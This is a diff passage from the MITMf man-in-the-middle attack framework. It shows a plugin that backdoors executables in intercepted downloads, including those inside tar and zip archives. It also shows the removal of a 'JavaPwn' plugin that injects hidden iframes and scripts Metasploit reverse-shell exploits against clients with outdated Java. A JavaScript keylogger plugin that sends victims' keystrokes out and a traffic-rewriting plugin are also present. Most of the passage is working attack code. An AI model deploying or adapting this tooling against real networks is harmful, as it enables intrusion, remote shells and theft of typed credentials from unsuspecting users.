OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.MachoIntelx64['SHELL'],
|
||||
HOST=self.MachoIntelx64['HOST'],
|
||||
PORT=int(self.MachoIntelx64['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||
FAT_PRIORITY=self.FatPriority
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
self.patched.put(result)
|
||||
return
|
||||
|
||||
except Exception as e:
|
||||
print 'Exception', str(e)
|
||||
mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
|
||||
return None
|
||||
|
||||
def tar_files(self, aTarFileBytes, formatt):
|
||||
"When called will unpack and edit a Tar File and return a tar file"
|
||||
|
||||
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
|
||||
|
||||
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
||||
print "[!] TarFile over allowed size"
|
||||
mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
|
||||
self.patched.put(aTarFileBytes)
|
||||
return
|
||||
|
||||
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
||||
tarFileStorage.write(aTarFileBytes)
|
||||
tarFileStorage.flush()
|
||||
|
||||
if not tarfile.is_tarfile(tarFileStorage.name):
|
||||
print '[!] Not a tar file'
|
||||
self.patched.put(aTarFileBytes)
|
||||
return
|
||||
|
||||
compressionMode = ':'
|
||||
if formatt == 'gz':
|
||||
compressionMode = ':gz'
|
||||
if formatt == 'bz':
|
||||
compressionMode = ':bz2'
|
||||
|
||||
tarFile = None
|
||||
try:
|
||||
tarFileStorage.seek(0)
|
||||
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
|
||||
except tarfile.ReadError:
|
||||
pass
|
||||
|
||||
if tarFile is None:
|
||||
print '[!] Not a tar file'
|
||||
self.patched.put(aTarFileBytes)
|
||||
return
|
||||
|
||||
print '[*] Tar file contents and info:'
|
||||
print '[*] Compression:', formatt
|
||||
|
||||
members = tarFile.getmembers()
|
||||
for info in members:
|
||||
print "\t", info.name, info.mtime, info.size
|
||||
|
||||
newTarFileStorage = tempfile.NamedTemporaryFile()
|
||||
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
|
||||
|
||||
patchCount = 0
|
||||
wasPatched = False
|
||||
|
||||
for info in members:
|
||||
print "[*] >>> Next file in tarfile:", info.name
|
||||
|
||||
if not info.isfile():
|
||||
print info.name, 'is not a file'
|
||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||
continue
|
||||
|
||||
if info.size >= long(self.FileSizeMax):
|
||||
print info.name, 'is too big'
|
||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||
continue
|
||||
|
||||
# Check against keywords
|
||||
keywordCheck = False
|
||||
|
||||
if type(self.tarblacklist) is str:
|
||||
if self.tarblacklist.lower() in info.name.lower():
|
||||
keywordCheck = True
|
||||
|
||||
else:
|
||||
for keyword in self.tarblacklist:
|
||||
if keyword.lower() in info.name.lower():
|
||||
keywordCheck = True
|
||||
continue
|
||||
|
||||
if keywordCheck is True:
|
||||
print "[!] Tar blacklist enforced!"
|
||||
mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
|
||||
continue
|
||||
|
||||
# Try to patch
|
||||
extractedFile = tarFile.extractfile(info)
|
||||
|
||||
if patchCount >= int(self.userConfig['TAR']['patchCount']):
|
||||
newTarFile.addfile(info, extractedFile)
|
||||
else:
|
||||
# create the file on disk temporarily for fileGrinder to run on it
|
||||
with tempfile.NamedTemporaryFile() as tmp:
|
||||
shutil.copyfileobj(extractedFile, tmp)
|
||||
tmp.flush()
|
||||
patchResult = self.binaryGrinder(tmp.name)
|
||||
if patchResult:
|
||||
patchCount += 1
|
||||
file2 = "backdoored/" + os.path.basename(tmp.name)
|
||||
print "[*] Patching complete, adding to tar file."
|
||||
info.size = os.stat(file2).st_size
|
||||
with open(file2, 'rb') as f:
|
||||
newTarFile.addfile(info, f)
|
||||
mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
|
||||
os.remove(file2)
|
||||
wasPatched = True
|
||||
else:
|
||||
print "[!] Patching failed"
|
||||
with open(tmp.name, 'rb') as f:
|
||||
newTarFile.addfile(info, f)
|
||||
mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
|
||||
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
||||
mitmf_logger.info("Met Tar config patchCount limit.")
|
||||
|
||||
# finalize the writing of the tar file first
|
||||
newTarFile.close()
|
||||
|
||||
# then read the new tar file into memory
|
||||
newTarFileStorage.seek(0)
|
||||
ret = newTarFileStorage.read()
|
||||
newTarFileStorage.close() # it's automatically deleted
|
||||
|
||||
if wasPatched is False:
|
||||
# If nothing was changed return the original
|
||||
print "[*] No files were patched forwarding original file"
|
||||
self.patched.put(aTarFileBytes)
|
||||
return
|
||||
else:
|
||||
self.patched.put(ret)
|
||||
return
|
||||
|
||||
def zip_files(self, aZipFile):
|
||||
"When called will unpack and edit a Zip File and return a zip file"
|
||||
|
||||
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
|
||||
|
||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
||||
print "[!] ZipFile over allowed size"
|
||||
mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
|
||||
self.patched.put(aZipFile)
|
||||
return
|
||||
|
||||
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
||||
tmpDir = '/tmp/' + tmpRan
|
||||
tmpFile = '/tmp/' + tmpRan + '.zip'
|
||||
|
||||
os.mkdir(tmpDir)
|
||||
|
||||
with open(tmpFile, 'w') as f:
|
||||
f.write(aZipFile)
|
||||
|
||||
zippyfile = zipfile.ZipFile(tmpFile, 'r')
|
||||
|
||||
#encryption test
|
||||
try:
|
||||
zippyfile.testzip()
|
||||
|
||||
except RuntimeError as e:
|
||||
if 'encrypted' in str(e):
|
||||
mitmf_logger.info('Encrypted zipfile found. Not patching.')
|
||||
return aZipFile
|
||||
|
||||
print "[*] ZipFile contents and info:"
|
||||
|
||||
for info in zippyfile.infolist():
|
||||
print "\t", info.filename, info.date_time, info.file_size
|
||||
|
||||
zippyfile.extractall(tmpDir)
|
||||
|
||||
patchCount = 0
|
||||
|
||||
wasPatched = False
|
||||
|
||||
for info in zippyfile.infolist():
|
||||
print "[*] >>> Next file in zipfile:", info.filename
|
||||
|
||||
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
||||
print info.filename, 'is a directory'
|
||||
continue
|
||||
|
||||
#Check against keywords
|
||||
keywordCheck = False
|
||||
|
||||
if type(self.zipblacklist) is str:
|
||||
if self.zipblacklist.lower() in info.filename.lower():
|
||||
keywordCheck = True
|
||||
|
||||
else:
|
||||
for keyword in self.zipblacklist:
|
||||
if keyword.lower() in info.filename.lower():
|
||||
keywordCheck = True
|
||||
continue
|
||||
|
||||
if keywordCheck is True:
|
||||
print "[!] Zip blacklist enforced!"
|
||||
mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
|
||||
continue
|
||||
|
||||
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
||||
|
||||
if patchResult:
|
||||
patchCount += 1
|
||||
file2 = "backdoored/" + os.path.basename(info.filename)
|
||||
print "[*] Patching complete, adding to zip file."
|
||||
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
||||
mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
|
||||
os.remove(file2)
|
||||
wasPatched = True
|
||||
else:
|
||||
print "[!] Patching failed"
|
||||
mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
|
||||
|
||||
print '-' * 10
|
||||
|
||||
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
||||
mitmf_logger.info("Met Zip config patchCount limit.")
|
||||
break
|
||||
|
||||
zippyfile.close()
|
||||
|
||||
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
||||
|
||||
print "[*] Writing to zipfile:", tmpFile
|
||||
|
||||
for base, dirs, files in os.walk(tmpDir):
|
||||
for afile in files:
|
||||
filename = os.path.join(base, afile)
|
||||
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
|
||||
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
||||
|
||||
zipResult.close()
|
||||
#clean up
|
||||
shutil.rmtree(tmpDir)
|
||||
|
||||
with open(tmpFile, 'rb') as f:
|
||||
tempZipFile = f.read()
|
||||
os.remove(tmpFile)
|
||||
|
||||
if wasPatched is False:
|
||||
print "[*] No files were patched forwarding original file"
|
||||
self.patched.put(aZipFile)
|
||||
return
|
||||
else:
|
||||
self.patched.put(tempZipFile)
|
||||
return
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
|
||||
content_header = request.client.headers['Content-Type']
|
||||
client_ip = request.client.getClientIP()
|
||||
|
||||
if content_header in self.zipMimeTypes:
|
||||
|
||||
if self.bytes_have_format(data, 'zip'):
|
||||
mitmf_logger.info("{} Detected supported zip file type!".format(client_ip))
|
||||
|
||||
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
|
||||
process.daemon = True
|
||||
process.start()
|
||||
process.join()
|
||||
bd_zip = self.patched.get()
|
||||
|
||||
if bd_zip:
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_zip}
|
||||
|
||||
else:
|
||||
for tartype in ['gz','bz','tar']:
|
||||
if self.bytes_have_format(data, tartype):
|
||||
mitmf_logger.info("{} Detected supported tar file type!".format(client_ip))
|
||||
|
||||
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
|
||||
process.daemon = True
|
||||
process.start()
|
||||
process.join()
|
||||
bd_tar = self.patched.get()
|
||||
|
||||
if bd_tar:
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_tar}
|
||||
|
||||
|
||||
elif content_header in self.binaryMimeTypes:
|
||||
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
||||
if self.bytes_have_format(data, bintype):
|
||||
mitmf_logger.info("{} Detected supported binary type!".format(client_ip))
|
||||
fd, tmpFile = mkstemp()
|
||||
with open(tmpFile, 'w') as f:
|
||||
f.write(data)
|
||||
|
||||
process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,))
|
||||
process.daemon = True
|
||||
process.start()
|
||||
process.join()
|
||||
patchb = self.patched.get()
|
||||
|
||||
if patchb:
|
||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
||||
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_binary}
|
||||
|
||||
else:
|
||||
mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header))
|
||||
return {'request': request, 'data': data}
|
|
@ -24,15 +24,10 @@ import re
|
|||
import sys
|
||||
import argparse
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr
|
||||
|
||||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.CacheKill import CacheKill
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Inject(CacheKill, Plugin):
|
||||
name = "Inject"
|
||||
optname = "inject"
|
||||
|
|
|
@ -1,235 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import string
|
||||
import random
|
||||
import threading
|
||||
import sys
|
||||
import logging
|
||||
|
||||
from core.msfrpc import Msfrpc
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.BrowserProfiler import BrowserProfiler
|
||||
from time import sleep
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr
|
||||
|
||||
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
||||
requests_log.setLevel(logging.WARNING)
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class JavaPwn(BrowserProfiler, Plugin):
|
||||
name = "JavaPwn"
|
||||
optname = "javapwn"
|
||||
desc = "Performs drive-by attacks on clients with out-of-date java browser plugins"
|
||||
tree_output = []
|
||||
depends = ["Browserprofiler"]
|
||||
version = "0.3"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.msfip = options.ip_address
|
||||
self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
|
||||
|
||||
try:
|
||||
msfcfg = options.configfile['MITMf']['Metasploit']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing Metasploit options in config file : " + str(e))
|
||||
|
||||
try:
|
||||
self.javacfg = options.configfile['JavaPwn']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing config for JavaPwn: " + str(e))
|
||||
|
||||
self.msfport = msfcfg['msfport']
|
||||
self.rpcip = msfcfg['rpcip']
|
||||
self.rpcpass = msfcfg['rpcpass']
|
||||
|
||||
#Initialize the BrowserProfiler plugin
|
||||
BrowserProfiler.initialize(self, options)
|
||||
self.black_ips = []
|
||||
|
||||
try:
|
||||
msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
|
||||
msf.login('msf', self.rpcpass)
|
||||
version = msf.call('core.version')['version']
|
||||
self.tree_output.append("Connected to Metasploit v%s" % version)
|
||||
except Exception:
|
||||
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||
|
||||
t = threading.Thread(name='pwn', target=self.pwn, args=(msf,))
|
||||
t.setDaemon(True)
|
||||
t.start() #start the main thread
|
||||
|
||||
def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
|
||||
return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5))
|
||||
|
||||
def get_exploit(self, java_version):
|
||||
exploits = []
|
||||
|
||||
client_vstring = java_version[:-len(java_version.split('.')[3])-1]
|
||||
client_uversion = int(java_version.split('.')[3])
|
||||
|
||||
for ver in self.javacfg['Multi'].iteritems():
|
||||
if type(ver[1]) is list:
|
||||
for list_vers in ver[1]:
|
||||
|
||||
version_string = list_vers[:-len(list_vers.split('.')[3])-1]
|
||||
update_version = int(list_vers.split('.')[3])
|
||||
|
||||
if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
|
||||
if client_uversion == update_version:
|
||||
exploits.append(ver[0])
|
||||
elif (client_vstring == version_string):
|
||||
if client_uversion <= update_version:
|
||||
exploits.append(ver[0])
|
||||
else:
|
||||
version_string = ver[1][:-len(ver[1].split('.')[3])-1]
|
||||
update_version = int(ver[1].split('.')[3])
|
||||
|
||||
if ('*' in version_string[:1]) and (client_vstring == version_string[1:]):
|
||||
if client_uversion == update_version:
|
||||
exploits.append(ver[0])
|
||||
elif client_vstring == version_string:
|
||||
if client_uversion <= update_version:
|
||||
exploits.append(ver[0])
|
||||
|
||||
return exploits
|
||||
|
||||
|
||||
def injectWait(self, msfinstance, url, client_ip): #here we inject an iframe to trigger the exploit and check for resulting sessions
|
||||
#inject iframe
|
||||
mitmf_logger.info("%s >> now injecting iframe to trigger exploit" % client_ip)
|
||||
self.html_payload = "<iframe src='http://%s:%s%s' height=0%% width=0%%></iframe>" % (self.msfip, self.msfport, url) #temporarily changes the code that the Browserprofiler plugin injects
|
||||
|
||||
mitmf_logger.info('%s >> waiting for ze shellz, Please wait...' % client_ip)
|
||||
|
||||
exit = False
|
||||
i = 1
|
||||
while i <= 30: #wait max 60 seconds for a new shell
|
||||
if exit:
|
||||
break
|
||||
shell = msfinstance.call('session.list') #poll metasploit every 2 seconds for new sessions
|
||||
if len(shell) > 0:
|
||||
for k, v in shell.iteritems():
|
||||
if client_ip in shell[k]['tunnel_peer']: #make sure the shell actually came from the ip that we targeted
|
||||
mitmf_logger.info("%s >> Got shell!" % client_ip)
|
||||
self.sploited_ips.append(client_ip) #target successfuly exploited :)
|
||||
self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
|
||||
exit = True
|
||||
break
|
||||
sleep(2)
|
||||
i += 1
|
||||
|
||||
if exit is False: #We didn't get a shell :(
|
||||
mitmf_logger.info("%s >> session not established after 30 seconds" % client_ip)
|
||||
|
||||
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
|
||||
|
||||
def send_command(self, cmd, msf, vic_ip):
|
||||
try:
|
||||
mitmf_logger.info("%s >> sending commands to metasploit" % vic_ip)
|
||||
|
||||
#Create a virtual console
|
||||
console_id = msf.call('console.create')['id']
|
||||
|
||||
#write the cmd to the newly created console
|
||||
msf.call('console.write', [console_id, cmd])
|
||||
|
||||
mitmf_logger.info("%s >> commands sent succesfully" % vic_ip)
|
||||
except Exception, e:
|
||||
mitmf_logger.info('%s >> Error accured while interacting with metasploit: %s:%s' % (vic_ip, Exception, e))
|
||||
|
||||
def pwn(self, msf):
|
||||
while True:
|
||||
if (len(self.dic_output) > 0) and self.dic_output['java_installed'] == '1': #only choose clients that we are 100% sure have the java plugin installed and enabled
|
||||
|
||||
brwprofile = self.dic_output #self.dic_output is the output of the BrowserProfiler plugin in a dictionary format
|
||||
|
||||
if brwprofile['ip'] not in self.sploited_ips: #continue only if the ip has not been already exploited
|
||||
|
||||
vic_ip = brwprofile['ip']
|
||||
|
||||
mitmf_logger.info("%s >> client has java version %s installed! Proceeding..." % (vic_ip, brwprofile['java_version']))
|
||||
mitmf_logger.info("%s >> Choosing exploit based on version string" % vic_ip)
|
||||
|
||||
exploits = self.get_exploit(brwprofile['java_version']) # get correct exploit strings defined in javapwn.cfg
|
||||
|
||||
if exploits:
|
||||
|
||||
if len(exploits) > 1:
|
||||
mitmf_logger.info("%s >> client is vulnerable to %s exploits!" % (vic_ip, len(exploits)))
|
||||
exploit = random.choice(exploits)
|
||||
mitmf_logger.info("%s >> choosing %s" %(vic_ip, exploit))
|
||||
else:
|
||||
mitmf_logger.info("%s >> client is vulnerable to %s!" % (vic_ip, exploits[0]))
|
||||
exploit = exploits[0]
|
||||
|
||||
#here we check to see if we already set up the exploit to avoid creating new jobs for no reason
|
||||
jobs = msf.call('job.list') #get running jobs
|
||||
if len(jobs) > 0:
|
||||
for k, v in jobs.iteritems():
|
||||
info = msf.call('job.info', [k])
|
||||
if exploit in info['name']:
|
||||
mitmf_logger.info('%s >> %s already started' % (vic_ip, exploit))
|
||||
url = info['uripath'] #get the url assigned to the exploit
|
||||
self.injectWait(msf, url, vic_ip)
|
||||
|
||||
else: #here we setup the exploit
|
||||
rand_port = random.randint(1000, 65535) #generate a random port for the payload listener
|
||||
rand_url = self.rand_url()
|
||||
#generate the command string to send to the virtual console
|
||||
#new line character very important as it simulates a user pressing enter
|
||||
cmd = "use exploit/%s\n" % exploit
|
||||
cmd += "set SRVPORT %s\n" % self.msfport
|
||||
cmd += "set URIPATH %s\n" % rand_url
|
||||
cmd += "set PAYLOAD generic/shell_reverse_tcp\n" #chose this payload because it can be upgraded to a full-meterpreter and its multi-platform
|
||||
cmd += "set LHOST %s\n" % self.msfip
|
||||
cmd += "set LPORT %s\n" % rand_port
|
||||
cmd += "exploit -j\n"
|
||||
|
||||
mitmf_logger.debug("command string:\n%s" % cmd)
|
||||
|
||||
self.send_command(cmd, msf, vic_ip)
|
||||
|
||||
self.injectWait(msf, rand_url, vic_ip)
|
||||
else:
|
||||
#this might be removed in the future since newer versions of Java break the signed applet attack (unless you have a valid cert)
|
||||
mitmf_logger.info("%s >> client is not vulnerable to any java exploit" % vic_ip)
|
||||
mitmf_logger.info("%s >> falling back to the signed applet attack" % vic_ip)
|
||||
|
||||
rand_url = self.rand_url()
|
||||
rand_port = random.randint(1000, 65535)
|
||||
|
||||
cmd = "use exploit/multi/browser/java_signed_applet\n"
|
||||
cmd += "set SRVPORT %s\n" % self.msfport
|
||||
cmd += "set URIPATH %s\n" % rand_url
|
||||
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
|
||||
cmd += "set LHOST %s\n" % self.msfip
|
||||
cmd += "set LPORT %s\n" % rand_port
|
||||
cmd += "exploit -j\n"
|
||||
|
||||
self.send_command(cmd, msf, vic_ip)
|
||||
self.injectWait(msf, rand_url, vic_ip)
|
||||
sleep(1)
|
|
@ -1,169 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
import logging
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class jskeylogger(Inject, Plugin):
|
||||
name = "Javascript Keylogger"
|
||||
optname = "jskeylogger"
|
||||
desc = "Injects a javascript keylogger into clients webpages"
|
||||
implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
|
||||
depends = ["Inject"]
|
||||
version = "0.2"
|
||||
has_opts = False
|
||||
|
||||
def initialize(self, options):
|
||||
Inject.initialize(self, options)
|
||||
self.html_payload = self.msf_keylogger()
|
||||
|
||||
def sendPostData(self, request):
|
||||
#Handle the plugin output
|
||||
if 'keylog' in request.uri:
|
||||
|
||||
raw_keys = request.postData.split("&&")[0]
|
||||
keys = raw_keys.split(",")
|
||||
del keys[0]; del(keys[len(keys)-1])
|
||||
|
||||
input_field = request.postData.split("&&")[1]
|
||||
|
||||
nice = ''
|
||||
for n in keys:
|
||||
if n == '9':
|
||||
nice += "<TAB>"
|
||||
elif n == '8':
|
||||
nice = nice.replace(nice[-1:], "")
|
||||
elif n == '13':
|
||||
nice = ''
|
||||
else:
|
||||
try:
|
||||
nice += n.decode('hex')
|
||||
except:
|
||||
mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
|
||||
|
||||
#try:
|
||||
# input_field = input_field.decode('hex')
|
||||
#except:
|
||||
# mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
|
||||
|
||||
mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
|
||||
|
||||
def msf_keylogger(self):
|
||||
#Stolen from the Metasploit module http_javascript_keylogger
|
||||
|
||||
payload = """<script type="text/javascript">
|
||||
window.onload = function mainfunc(){
|
||||
var2 = ",";
|
||||
name = '';
|
||||
function make_xhr(){
|
||||
var xhr;
|
||||
try {
|
||||
xhr = new XMLHttpRequest();
|
||||
} catch(e) {
|
||||
try {
|
||||
xhr = new ActiveXObject("Microsoft.XMLHTTP");
|
||||
} catch(e) {
|
||||
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
|
||||
}
|
||||
}
|
||||
if(!xhr) {
|
||||
throw "failed to create XMLHttpRequest";
|
||||
}
|
||||
return xhr;
|
||||
}
|
||||
|
||||
xhr = make_xhr();
|
||||
xhr.onreadystatechange = function() {
|
||||
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
|
||||
eval(xhr.responseText);
|
||||
}
|
||||
}
|
||||
|
||||
if (window.addEventListener) {
|
||||
document.addEventListener('keypress', function2, true);
|
||||
document.addEventListener('keydown', function1, true);
|
||||
} else if (window.attachEvent) {
|
||||
document.attachEvent('onkeypress', function2);
|
||||
document.attachEvent('onkeydown', function1);
|
||||
} else {
|
||||
document.onkeypress = function2;
|
||||
document.onkeydown = function1;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
function function2(e)
|
||||
{
|
||||
srcname = window.event.srcElement.name;
|
||||
var3 = (window.event) ? window.event.keyCode : e.which;
|
||||
var3 = var3.toString(16);
|
||||
|
||||
if (var3 != "d")
|
||||
{
|
||||
andxhr(var3, srcname);
|
||||
}
|
||||
}
|
||||
|
||||
function function1(e)
|
||||
{
|
||||
srcname = window.event.srcElement.name;
|
||||
id = window.event.srcElement.id;
|
||||
|
||||
var3 = (window.event) ? window.event.keyCode : e.which;
|
||||
if (var3 == 9 || var3 == 8 || var3 == 13)
|
||||
{
|
||||
andxhr(var3, srcname);
|
||||
}
|
||||
else if (var3 == 0)
|
||||
{
|
||||
|
||||
text = document.getElementById(id).value;
|
||||
if (text.length != 0)
|
||||
{
|
||||
andxhr(text.toString(16), srcname);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
function andxhr(key, inputName)
|
||||
{
|
||||
if (inputName != name)
|
||||
{
|
||||
name = inputName;
|
||||
var2 = ",";
|
||||
}
|
||||
|
||||
var2= var2 + key + ",";
|
||||
|
||||
xhr.open("POST", "keylog", true);
|
||||
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
|
||||
xhr.send(var2 + '&&' + inputName);
|
||||
|
||||
if (key == 13 || var2.length > 3000)
|
||||
{
|
||||
var2 = ",";
|
||||
}
|
||||
}
|
||||
</script>"""
|
||||
|
||||
return payload
|
|
@ -1,105 +0,0 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
"""
|
||||
Plugin by @rubenthijssen
|
||||
"""
|
||||
|
||||
import sys
|
||||
import logging
|
||||
import time
|
||||
import re
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.CacheKill import CacheKill
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Replace(CacheKill, Plugin):
|
||||
name = "Replace"
|
||||
optname = "replace"
|
||||
desc = "Replace arbitrary content in HTML content"
|
||||
implements = ["handleResponse", "handleHeader", "connectionMade"]
|
||||
depends = ["CacheKill"]
|
||||
version = "0.1"
|
||||
has_opts = True
|
||||
|
||||
def initialize(self, options):
|
||||
self.options = options
|
||||
|
||||
self.search_str = options.search_str
|
||||
self.replace_str = options.replace_str
|
||||
self.regex_file = options.regex_file
|
||||
|
||||
if (self.search_str is None or self.search_str == "") and self.regex_file is None:
|
||||
sys.exit("[-] Please provide a search string or a regex file")
|
||||
|
||||
self.regexes = []
|
||||
if self.regex_file is not None:
|
||||
for line in self.regex_file:
|
||||
self.regexes.append(line.strip().split("\t"))
|
||||
|
||||
if self.options.keep_cache:
|
||||
self.implements.remove("handleHeader")
|
||||
self.implements.remove("connectionMade")
|
||||
|
||||
self.ctable = {}
|
||||
self.dtable = {}
|
||||
self.mime = "text/html"
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
ip, hn, mime = self._get_req_info(request)
|
||||
|
||||
if self._should_replace(ip, hn, mime):
|
||||
|
||||
if self.search_str is not None and self.search_str != "":
|
||||
data = data.replace(self.search_str, self.replace_str)
|
||||
mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
|
||||
|
||||
# Did the user provide us with a regex file?
|
||||
for regex in self.regexes:
|
||||
try:
|
||||
data = re.sub(regex[0], regex[1], data)
|
||||
|
||||
mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
|
||||
except Exception:
|
||||
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
|
||||
|
||||
self.ctable[ip] = time.time()
|
||||
self.dtable[ip+hn] = True
|
||||
|
||||
return {'request': request, 'data': data}
|
||||
|
||||
return
|
||||
|
||||
def add_options(self, options):
|
||||
